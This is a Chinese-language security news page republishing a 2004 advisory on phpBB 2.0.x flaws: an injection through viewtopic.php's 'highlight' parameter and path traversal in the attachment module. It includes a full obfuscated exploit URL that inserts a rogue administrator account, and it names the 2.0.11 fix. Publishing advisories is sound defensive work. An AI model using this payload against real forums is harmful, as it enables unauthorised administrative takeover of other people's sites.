51CTO旗下网站

地图

社区：论坛博客下载读书更多

您所在的位置：网络安全 > 漏洞补丁 > phpBB任意用户增加和附件模块跨站脚本漏洞

phpBB任意用户增加和附件模块跨站脚本漏洞

2005-08-10 10:35 51CTO.COM 我要评论(0) 字号：T | T

一键收藏，随时查看，分享好友！

其它##远程进入系统##注意防范

AD：

信息提供：	安全公告（或线索）提供热线：51cto.editor@gmail.com
漏洞类别：	跨站脚本漏洞
攻击类型：	远程攻击
发布日期：	2004-11-26
更新日期：	2004-11-29
受影响系统：	phpBB Group phpBB 2.0.9 phpBB Group phpBB 2.0.8 a phpBB Group phpBB 2.0.8 phpBB Group phpBB 2.0.7 phpBB Group phpBB 2.0.6 d phpBB Group phpBB 2.0.6 c phpBB Group phpBB 2.0.6 phpBB Group phpBB 2.0.5 phpBB Group phpBB 2.0.4 phpBB Group phpBB 2.0.3 phpBB Group phpBB 2.0.2 phpBB Group phpBB 2.0.10 phpBB Group phpBB 2.0.1 phpBB Group phpBB 2.0
安全系统：	phpBB Group phpBB 2.0.11
漏洞报告人：	Zeelock
漏洞描述：	phpBB是一款使用多种模块扩展的流行的论坛系统。 phpBB 'viewtopic.php'对用户提交的参数缺少充分过滤，远程攻击者可以利用这个漏洞增加任意拥有管理权限的用户帐户。 'viewtopic.php'对'highlight'参数缺少充分检查，提交使用多个char()函数的SQL查询，可在系统中增加管理员权限的用户帐户。另外附件模块对用户提交给"UPLOAD_DIR"字段数据缺少充分过滤，提交包含多个'../'字符的数据，可绕过WEB ROOT限制，以进程权限查看系统文件内容。
测试方法：	警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ --- Code start ---- http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr (73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32) %252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25 2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252 echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25 2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2 52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2 52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2 52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)% 252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)% 252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)% 252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44) %252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108 )%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32 )%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25 2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39 )%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108) %252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2 52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr (102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98 )%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25 2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr( 41))%252e%2527 --- code end ---
解决方法：	目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载升级到phpBB 2.0.11版本： http://www.phpbb.com

给力
(0票)
动心
(0票)
废话
(0票)
专业
(0票)
标题党
(0票)
路过
(0票)

原文：phpBB任意用户增加和附件模块跨站脚本漏洞 返回网络安全首页

分享到：

收藏|打印|复制

关于漏洞 PHP 附件的更多文章

双剑合璧 PHP+MySQL的最佳实践

双剑合璧 PHP+MySQL的最佳实践

PHP语言和MySQL数据库这两种开源技术已经成为开发Web应用的最佳[详细]

网友评论TOP5

查看所有评论（）

提交评论

栏目热门

同期最新

网络安全

频道导航

热点推荐

热门标签： windows频道移动开发云计算 objective-c tp-link路由器设置图解 html5

原创解读:UTM双机热备和虚拟域功能
目前，人们享受网络带给人们工作、生活种种便利的同时，也饱受着各种各样网络安全的问题。

文章排行

本月本周 24小时

热点专题

网康2011新布局：管理

网康科技2011年新产品发布暨全国巡展今天正式启动，今
十大工具及应用策略搞

去年，OWASP峰会在京召开，会议上就提出了关于OWASP十
WEB应用威胁多防黑防

Web Application Firewall又名WEB应用安全防火墙，简

点击这里查看样刊

全站热点

读书

PHP程序开发范例宝典

本书全面介绍了应用PHP进行网站开发的各种技术和技巧。全书分为20章，内容包括PHP的运行环境配置、表单及表单元素的应用、CSS与J

博文推荐

最新热帖

51CTO旗下网站

领先的IT技术网站 51CTO 领先的中文存储媒体 WatchStor 中国首个CIO网站 CIOage 中国首家数字医疗网站 HC3i 移动互联网生活门户灵客风LinkPhone